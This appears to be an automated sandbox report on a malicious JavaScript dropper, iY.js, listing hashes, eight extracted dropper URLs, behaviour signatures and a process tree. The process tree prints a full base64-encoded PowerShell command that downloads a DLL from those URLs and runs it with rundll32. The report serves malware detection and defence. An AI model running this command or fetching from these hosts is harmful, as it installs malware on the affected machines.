6239e4bf81f1fded401ed955f1f870bf1b51a1fd1916a8c7629295b3a84604a6

Resubmissions

21-03-2023 07:01

230321-hs7x9shb54 10

21-03-2023 06:49

230321-hlmczsbb4t 10

Analysis

max time kernel
118s
max time network
30s
platform
windows7_x64
resource
win7-20230220-en
resource tags

arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
submitted
21-03-2023 07:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

iY.js
Size

53KB
MD5

36621d51e958d1e3154d1d6e81b8e93a
SHA1

9ce87c16dc0cad0e0fcf709edb8b0a635e82432e
SHA256

6239e4bf81f1fded401ed955f1f870bf1b51a1fd1916a8c7629295b3a84604a6
SHA512

a22da574a2d155fd66bbcc1b409cc8164785c336a3d87611af12ff57f426f2e9cdde3befc57efeea879e7bbde2ff96e2a264fd6e29a7914d251476270f847e5a
SSDEEP

768:wraoPeWohY+es08VMrE0Uytgk2Z9l7dabRGrpIHFLgkExBpxjwLsz/ERHAQMxqG:wramJows0XrEhobYqL6xB3MLsz/NFxx

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://discountlandllc.com/uUbH/cW2ebg

exe.dropper

https://kingzunlimited.com/VvAmv/mUioIIipJTQQ

exe.dropper

https://smeolbd.com/ntaUX/3MDVH9cdpva7

exe.dropper

https://odwazig.nl/xNV7x/uZMaE4mcum

exe.dropper

https://sobanaze.com/cJn7i/0f8a0t81i

exe.dropper

https://canadianused.com/euSgOJA/QcQ6SSc

exe.dropper

https://getcash2surveys.com/0HFE0G/NYoKEHjWnhRr

exe.dropper

https://onestopsilkscreeners.ca/o6g4bt1/CC8ely1q

Signatures

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
520	powershell.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	520	powershell.exe
Token: 33	1240	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	1240	AUDIODG.EXE
Token: 33	1240	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	1240	AUDIODG.EXE

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 288 wrote to memory of 520	288	wscript.exe	28
PID 288 wrote to memory of 520	288	wscript.exe	28
PID 288 wrote to memory of 520	288	wscript.exe	28

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\iY.js
1⤵
- Suspicious use of WriteProcessMemory
PID:288
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA7ACQAQQBuAGcAdQBpAHMAaABmAHUAbAAgAD0AIAAoACIAaAB0AHQAcABzADoALwAvAGQAaQBzAGMAbwB1AG4AdABsAGEAbgBkAGwAbABjAC4AYwBvAG0ALwB1AFUAYgBIAC8AYwBXADIAZQBiAGcALABoAHQAdABwAHMAOgAvAC8AawBpAG4AZwB6AHUAbgBsAGkAbQBpAHQAZQBkAC4AYwBvAG0ALwBWAHYAQQBtAHYALwBtAFUAaQBvAEkASQBpAHAASgBUAFEAUQAsAGgAdAB0AHAAcwA6AC8ALwBzAG0AZQBvAGwAYgBkAC4AYwBvAG0ALwBuAHQAYQBVAFgALwAzAE0ARABWAEgAOQBjAGQAcAB2AGEANwAsAGgAdAB0AHAAcwA6AC8ALwBvAGQAdwBhAHoAaQBnAC4AbgBsAC8AeABOAFYANwB4AC8AdQBaAE0AYQBFADQAbQBjAHUAbQAsAGgAdAB0AHAAcwA6AC8ALwBzAG8AYgBhAG4AYQB6AGUALgBjAG8AbQAvAGMASgBuADcAaQAvADAAZgA4AGEAMAB0ADgAMQBpACwAaAB0AHQAcABzADoALwAvAGMAYQBuAGEAZABpAGEAbgB1AHMAZQBkAC4AYwBvAG0ALwBlAHUAUwBnAE8ASgBBAC8AUQBjAFEANgBTAFMAYwAsAGgAdAB0AHAAcwA6AC8ALwBnAGUAdABjAGEAcwBoADIAcwB1AHIAdgBlAHkAcwAuAGMAbwBtAC8AMABIAEYARQAwAEcALwBOAFkAbwBLAEUASABqAFcAbgBoAFIAcgAsAGgAdAB0AHAAcwA6AC8ALwBvAG4AZQBzAHQAbwBwAHMAaQBsAGsAcwBjAHIAZQBlAG4AZQByAHMALgBjAGEALwBvADYAZwA0AGIAdAAxAC8AQwBDADgAZQBsAHkAMQBxACIAKQAuAHMAcABsAGkAdAAoACIALAAiACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAHUAbgBwAGUAcgBzAG8AbgBzAEMAaQByAGMAdQBtACAAaQBuACAAJABBAG4AZwB1AGkAcwBoAGYAdQBsACkAIAB7AHQAcgB5ACAAewBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAkAHUAbgBwAGUAcgBzAG8AbgBzAEMAaQByAGMAdQBtACAALQBUAGkAbQBlAG8AdQB0AFMAZQBjACAAMQA1ACAALQBPACAAJABlAG4AdgA6AFQARQBNAFAAXABiAGkAdAB0AGUAcgBpAG4AZwAuAGQAbABsADsAaQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgACQAZQBuAHYAOgBUAEUATQBQAFwAYgBpAHQAdABlAHIAaQBuAGcALgBkAGwAbAApAC4AbABlAG4AZwB0AGgAIAAtAGcAZQAgADEAMAAwADAAMAAwACkAIAB7AHMAdABhAHIAdAAgAHIAdQBuAGQAbABsADMAMgAgACQAZQBuAHYAOgBUAEUATQBQAFwAXABiAGkAdAB0AGUAcgBpAG4AZwAuAGQAbABsACwAVwBXADUAMAA7AGIAcgBlAGEAawA7AH0AfQBjAGEAdABjAGgAIAB7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADMAOwB9AH0A"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:520

C:\Windows\system32\verclsid.exe
"C:\Windows\system32\verclsid.exe" /S /C {0B2C9183-C9FA-4C53-AE21-C900B0C39965} /I {0C733A8A-2A1C-11CE-ADE5-00AA0044773D} /X 0x401
1⤵
PID:1472

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x4f0
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1240

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/520-58-0x000000001B240000-0x000000001B522000-memory.dmp

Filesize
2.9MB

Download
memory/520-59-0x00000000024E0000-0x00000000024E8000-memory.dmp

Filesize
32KB

Download
memory/520-60-0x0000000002500000-0x0000000002580000-memory.dmp

Filesize
512KB

Download
memory/520-61-0x0000000002500000-0x0000000002580000-memory.dmp

Filesize
512KB

Download
memory/520-62-0x0000000002500000-0x0000000002580000-memory.dmp

Filesize
512KB

Download
memory/520-63-0x0000000002500000-0x0000000002580000-memory.dmp

Filesize
512KB

Download
memory/520-64-0x0000000002500000-0x0000000002580000-memory.dmp

Filesize
512KB

Download
memory/520-65-0x0000000002500000-0x0000000002580000-memory.dmp

Filesize
512KB

Download